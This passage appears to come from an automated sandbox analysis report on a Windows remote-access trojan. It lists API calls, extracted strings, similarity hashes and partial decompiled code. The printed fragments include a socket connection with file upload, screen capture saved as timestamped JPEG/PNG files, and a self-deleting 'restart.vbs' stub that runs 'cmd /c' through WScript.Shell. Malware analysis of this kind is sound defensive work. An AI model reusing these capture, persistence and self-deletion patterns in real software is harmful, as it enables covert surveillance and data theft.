                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                    • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403619
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040362A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403633
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 004036F3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,?,0000FDE8,00000000), ref: 004036FE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403707
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(File Upload: unexpected disconnection,?), ref: 0040371F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?), ref: 0040372F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@D@2@@0@V?$basic_string@$Hstd@@$V01@V10@@$??4?$basic_string@?c_str@?$basic_string@V01@@V10@$??9std@@?append@?$basic_string@?empty@?$basic_string@?length@?$basic_string@?size@?$basic_string@LocalTimeV10@0@V12@Y?$basic_string@printfrecv
                                  • String ID: File Upload: unexpected disconnection$FileSize: $[DEBUG]$[INFO]$nTotBytesRecv:
                                  • API String ID: 2510920776-3166941866
                                  • Opcode ID: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                  • Instruction ID: 46474c331338e0ade551c9c3ffb0e9ad5c3b9d5b5a2bd20438cea0ecd9357ef1
                                  • Opcode Fuzzy Hash: 0fd7534d0b1fd9e58be76c0a3dd4330a8e1245cd190f172d0bc5a71bc7ecd19e
                                  • Instruction Fuzzy Hash: 6D810B7290050DEBCB05EF90DC999EEBB7CEF54356F00406AF516A31A0DB749A85CFA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004089A6, Relevance: 63.1, APIs: 29, Strings: 7, Instructions: 134COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004089BD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004089C6
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 004089E4
                                    • Part of subcall function 0040B692: RegOpenKeyExA.KERNEL32(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                    • Part of subcall function 0040B692: RegQueryValueExA.KERNEL32(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                    • Part of subcall function 0040B692: RegCloseKey.ADVAPI32(0040936A), ref: 0040B6D3
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00408A07
                                  • _wgetenv.MSVCRT ref: 00408A1B
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00408A26
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A31
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408A3C
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00408A49
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 00408A60
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408A7A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A85
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00408A92
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408A9F
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408AAB
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AB4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ABD
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AC6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408ACF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408AD8
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408AE6
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408AF0
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408AFA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408B06
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408B24
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408B31
                                  • exit.MSVCRT ref: 00408B3D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B46
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408B4F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                  • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$\restart.vbs$exepath$open
                                  • API String ID: 864010295-1332127163
                                  • Opcode ID: 1c6ab792c620b6584a4ab4f98d9966bb31bfee14e9a6bd9bcf280c06ec755d35
                                  • Instruction ID: 8251d2866ff4eed12a0f1102d9a403ddb7336c21f91015765539e7c592c0bf1e
                                  • Opcode Fuzzy Hash: 1c6ab792c620b6584a4ab4f98d9966bb31bfee14e9a6bd9bcf280c06ec755d35
                                  • Instruction Fuzzy Hash: 25413D7280050DEBCB00EBA0ED49DEE777CEF98345B54407AF516E3091EB795A09CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F5F4, Relevance: 56.3, APIs: 31, Strings: 1, Instructions: 265COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040FA46: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                    • Part of subcall function 0040FA46: CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                    • Part of subcall function 0040FA46: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F676
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040F680
                                  • SHCreateMemStream.SHLWAPI(00000000), ref: 0040F687
                                  • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,00000000), ref: 0040F6D4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 0040F70C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000), ref: 0040F72F
                                  • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,0000000A), ref: 0040F755
                                  • _itoa.MSVCRT ref: 0040F75C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                    • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                    • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                    • Part of subcall function 00402118: CreateThread.KERNEL32(00000000,00000000,00402137,?,00000000,00000000), ref: 0040212D
                                    • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                    • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                    • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                    • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                    • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                    • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                    • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,?,0041B310,?,0041B310,0041C0C8,0041B310,00000000,00000000,?,?,?,0041BF08), ref: 0040F7EF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,0041BF08), ref: 0040F7FF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,0041BF08), ref: 0040F80F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F81F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,0041BF08), ref: 0040F82C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040F83C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F84C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000010), ref: 0040F86D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F879
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F882
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F88E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F89A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8A6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8B2
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040F8BE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040F856
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004D,?,?,?,?,?,?), ref: 0040F900
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F909
                                    • Part of subcall function 0040F984: GdipDisposeImage.GDIPLUS(?,00410AE2), ref: 0040F98D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$??0?$basic_string@V10@0@$Create$D@1@@$?size@?$basic_string@G@2@@std@@G@std@@V01@@$?begin@?$basic_string@?c_str@?$basic_string@Stream_itoa$?end@?$basic_string@?length@?$basic_string@CompatibleDisposeGdipImageThreadV10@@connectsocket
                                  • String ID: image/jpeg
                                  • API String ID: 1042780377-3785015651
                                  • Opcode ID: 3f767a8e3f93650d7b3944b411ef26bd8ce0f52d5284a6ecbfda72a0d1101bb8
                                  • Instruction ID: 2cf9f006c0d4929ef9c332e6db0d7f76cf60b2cff1cc21eb26a78d91115eee6c
                                  • Opcode Fuzzy Hash: 3f767a8e3f93650d7b3944b411ef26bd8ce0f52d5284a6ecbfda72a0d1101bb8
                                  • Instruction Fuzzy Hash: 74915172900109ABDB10EFA1DC49EEF7B7CEF54304F00847AF916A7191EB745A49CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410B1B, Relevance: 56.2, APIs: 30, Strings: 2, Instructions: 187sleeptimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • _EH_prolog.MSVCRT ref: 00410B20
                                  • GdiplusStartup.GDIPLUS(0041BF18,?,00000000,00000000,00000000,00000000), ref: 00410B59
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410B79
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410B85
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(0000001A), ref: 00410BAA
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 00410BBC
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00410BDC
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BE8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00410BF4
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00410BFD
                                  • CreateDirectoryW.KERNEL32(00000000), ref: 00410C04
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C17
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410C2A
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00415898), ref: 00410C89
                                  • Sleep.KERNEL32(000003E8), ref: 00410CA6
                                  • GetLocalTime.KERNEL32(?), ref: 00410CB1
                                  • swprintf.MSVCRT(?,00416AC0,?,?,?,?,?,?), ref: 00410CF4
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,0041BFB8,00415A24,?,00415898), ref: 00410D1A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415898), ref: 00410D2A
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,?,00415898), ref: 00410D3A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00415898), ref: 00410D49
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D55
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D61
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00415898), ref: 00410D6D
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,00415898), ref: 00410D7D
                                    • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,png,0041BCB0), ref: 00410958
                                    • Part of subcall function 0041093F: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00410963
                                    • Part of subcall function 0041093F: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041096E
                                    • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410989
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410993
                                    • Part of subcall function 0041093F: SHCreateMemStream.SHLWAPI(00000000), ref: 0041099A
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000,00000000,00000000), ref: 004109C2
                                    • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000), ref: 004109DF
                                    • Part of subcall function 0041093F: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004109F5
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00410A02
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00410A1B
                                    • Part of subcall function 0041093F: DeleteFileW.KERNEL32(00000000), ref: 00410A22
                                    • Part of subcall function 0041093F: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00410A2F
                                    • Part of subcall function 0041093F: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A38
                                    • Part of subcall function 0041093F: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00410A4D
                                    • Part of subcall function 0041093F: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00410A57
                                    • Part of subcall function 0041093F: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00410D89,?,dat,?,00000000), ref: 00410A7F
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015,?,?,?,?,?,?,?,00415898), ref: 00410D9B
                                  • atoi.MSVCRT ref: 00410DA2
                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00415898), ref: 00410DB0
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,00415898), ref: 00410DC9
                                  • atoi.MSVCRT ref: 00410DD0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$D@2@@std@@D@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$G@1@@G@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?data@?$basic_string@V01@$?size@?$basic_string@CreateSleepatoi$?length@?$basic_string@D@1@@DeleteDirectoryFileGdiplusH_prologLocalStartupStreamTimeswprintf
                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                  • API String ID: 2994672083-3790400642
                                  • Opcode ID: 7c42cc7d4d28be9671bebd868501b0c52943684f992789d1d633ca31faaf5797
                                  • Instruction ID: 09d63aef6d3d8e876cb0f678efb75e9f291bc689162efedecff38abdc591dce5
                                  • Opcode Fuzzy Hash: 7c42cc7d4d28be9671bebd868501b0c52943684f992789d1d633ca31faaf5797
                                  • Instruction Fuzzy Hash: 9C71A37190061DEBCB15ABA0DC8DBEE7778AB84305F1480AAF509A7191EB784AC58F5C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410F04, Relevance: 54.4, APIs: 36, Instructions: 407COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 21%
                                  			E00410F04(intOrPtr* __eax, void* __eflags, char _a8) {
				char _v20;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				char _v104;
				char _v120;
				char _v136;
				char _v152;
				char _v168;
				char _v184;
				char _v200;
				char _v216;
				void* _t69;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t78;
				char* _t83;
				void* _t85;
				void* _t86;
				void* _t88;
				char* _t92;
				void* _t94;
				void* _t95;
				void* _t97;
				char* _t101;
				void* _t103;
				void* _t104;
				void* _t106;
				char* _t110;
				void* _t112;
				char* _t118;
				char* _t119;
				char* _t120;
				intOrPtr* _t123;
				void* _t125;
				void* _t127;
				char* _t130;
				char* _t135;
				char* _t136;
				char* _t137;
				intOrPtr _t139;
				void* _t230;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t241;
				void* _t242;
				void* _t247;
				void* _t248;
				void* _t253;
				void* _t254;
				void* _t264;
				void* _t265;

				__imp__??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z(0);
				_t139 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z( *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_a8, 0x41b310,  &_v40,  &_v40, 1);
				_t233 = _t230 + 0x24;
				_t69 = _t139 - 1;
				if(_t69 == 0) {
					E00412855(_t233 - 0xc, _t233 - 0xc, E004113C9( &_v216));
					E004020C2(0x41c130);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(0x79);
					L26:
					_t74 = E004017DD( &_v20);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t74;
				}
				_t75 = _t69 - 1;
				if(_t75 == 0) {
					_t76 = E004119AD( &_v20, 0);
					_t235 = _t233 - 0x10;
					_push(_t76);
					E00412881(_t76);
					_t78 = E00411700(_t235);
